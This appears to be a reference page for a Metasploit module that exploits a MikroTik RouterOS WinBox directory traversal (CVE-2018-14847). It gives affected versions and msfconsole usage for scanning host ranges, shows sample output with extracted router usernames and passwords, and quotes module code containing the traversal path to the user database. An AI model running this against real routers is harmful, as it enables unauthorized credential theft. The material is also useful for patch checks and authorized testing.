Mikrotik Winbox Arbitrary File Read - Metasploit


This page contains detailed information about how to use the auxiliary/gather/mikrotik_winbox_fileread metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Mikrotik Winbox Arbitrary File Read
Module: auxiliary/gather/mikrotik_winbox_fileread
Source code: modules/auxiliary/gather/mikrotik_winbox_fileread.py
Disclosure date: 2018-08-02
Last modification time: 2020-11-04 14:18:34 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 8291
List of CVEs: CVE-2018-14847

MikroTik RouterOS (bugfix) 6.30.1-6.40.7, (current) 6.29-6.42, (RC) 6.29rc1-6.43rc3 allows unauthenticated remote attackers to read arbitrary files through a directory traversal through the WinBox interface (typically port 8291).

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/gather/mikrotik_winbox_fileread
msf auxiliary(mikrotik_winbox_fileread) > show options
    ... show and set options ...
msf auxiliary(mikrotik_winbox_fileread) > set RHOSTS ip-range
msf auxiliary(mikrotik_winbox_fileread) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(mikrotik_winbox_fileread) > set RHOSTS 192.168.1.3-192.168.1.200

Example 2:

msf auxiliary(mikrotik_winbox_fileread) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(mikrotik_winbox_fileread) > set RHOSTS file:/tmp/ip_list.txt

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base

Vulnerable Application

MikroTik RouterOS allows unauthenticated remote attackers to read arbitrary files through a directory traversal through the WinBox interface (typically port 8291).

Vulnerable versions of MikroTik RouterOS:

  • (bugfix) 6.30.1-6.40.7
  • (current) 6.29-6.42
  • (RC) 6.29rc1-6.43rc3

MikroTik images can be downloaded from here

Adding Users

To add users to the MikroTik device, use the following commands:

Get the groups first

/user group print

Add a user

/user add name=[name] password=[password] group=[group]

Verification Steps

  1. Start msfconsole
  2. Do: use auxiliary/gather/mikrotik_winbox_fileread
  3. Do: set rhosts [IP]
  4. Do: run
  5. You should credentials.

Scenarios

Mikrotik Cloud Router RouterOS 6.40.4

msf5 > use auxiliary/gather/mikrotik_winbox_fileread 
msf5 auxiliary(gather/mikrotik_winbox_fileread) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf5 auxiliary(gather/mikrotik_winbox_fileread) > run

[*] Running for 1.1.1.1...
[*] 1.1.1.1 - Session ID: 54
[*] 1.1.1.1 - Requesting user database through exploit
[*] 1.1.1.1 - Exploit successful, attempting to extract usernames & passwords
[*] 1.1.1.1 - Extracted Username: "write" and password "write"
[*] 1.1.1.1 - Extracted Username: "read" and password "read"
[*] 1.1.1.1 - Extracted Username: "admin" and password ""
[*] 1.1.1.1 - Extracted Username: "user2" and password "password1"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage

Here is how the gather/mikrotik_winbox_fileread auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/mikrotik_winbox_fileread

msf6 auxiliary(gather/mikrotik_winbox_fileread) > show info

       Name: Mikrotik Winbox Arbitrary File Read
     Module: auxiliary/gather/mikrotik_winbox_fileread
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-08-02

Provided by:
  mosajjal
  h00die

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  THREADS  1                yes       The number of concurrent threads (max one per host)
  rport    8291             yes       Target port

Description:
  MikroTik RouterOS (bugfix) 6.30.1-6.40.7, (current) 6.29-6.42, (RC) 
  6.29rc1-6.43rc3 allows unauthenticated remote attackers to read 
  arbitrary files through a directory traversal through the WinBox 
  interface (typically port 8291).

References:
  https://github.com/BasuCert/WinboxPoC
  https://blog.n0p.me/2018/05/2018-05-21-winbox-bug-dissection/
  https://blog.mikrotik.com/security/winbox-vulnerability.html
  https://nvd.nist.gov/vuln/detail/CVE-2018-14847
  https://www.exploit-db.com/exploits/45578

Module Options

This is a complete list of options available in the gather/mikrotik_winbox_fileread auxiliary module:

msf6 auxiliary(gather/mikrotik_winbox_fileread) > show options

Module options (auxiliary/gather/mikrotik_winbox_fileread):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS  1                yes       The number of concurrent threads (max one per host)
   rport    8291             yes       Target port

Advanced Options

Here is a complete list of advanced options supported by the gather/mikrotik_winbox_fileread auxiliary module:

msf6 auxiliary(gather/mikrotik_winbox_fileread) > show advanced

Module advanced options (auxiliary/gather/mikrotik_winbox_fileread):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   ShowProgress         true             yes       Display progress messages during a scan
   ShowProgressPercent  10               yes       The interval in percent that progress should be shown
   VERBOSE              false            no        Enable detailed status messages
   WORKSPACE                             no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the gather/mikrotik_winbox_fileread module can do:

msf6 auxiliary(gather/mikrotik_winbox_fileread) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the gather/mikrotik_winbox_fileread auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/mikrotik_winbox_fileread) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Module dependency (requests) is missing, cannot continue

Here is a relevant code snippet related to the "Module dependency (requests) is missing, cannot continue" error message:

89:	# end of direct port
90:	
91:	def run(args):
92:	    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
93:	    if dependencies_missing:
94:	        logging.error('Module dependency (requests) is missing, cannot continue')
95:	        return
96:	
97:	    # full file to pull
98:	    file = b'/////./..//////./..//////./../flash/rw/store/user.dat'
99:

Connection error: {}

Here is a relevant code snippet related to the "Connection error: {}" error message:

124:	    s = socket.socket()
125:	    s.settimeout(3)
126:	    try:
127:	        s.connect((args['rhost'], int(args['rport'])))
128:	    except Exception as e:
129:	        logging.error("Connection error: {}".format(e))
130:	        return
131:	
132:	    #Convert to bytearray for manipulation
133:	    a = bytearray(a)
134:	    b = bytearray(b)

Connection error: {}

Here is a relevant code snippet related to the "Connection error: {}" error message:

136:	    #Send hello and recieve the sesison id
137:	    s.send(a)
138:	    try:
139:	        d = bytearray(s.recv(1024))
140:	    except Exception as e:
141:	        logging.error("Connection error: {}".format(e))
142:	        return
143:	
144:	    session_id = d[38]
145:	    logging.info("Session ID: {}".format(session_id))
146:	    #Replace the session id in template

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • mosajjal
  • h00die

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.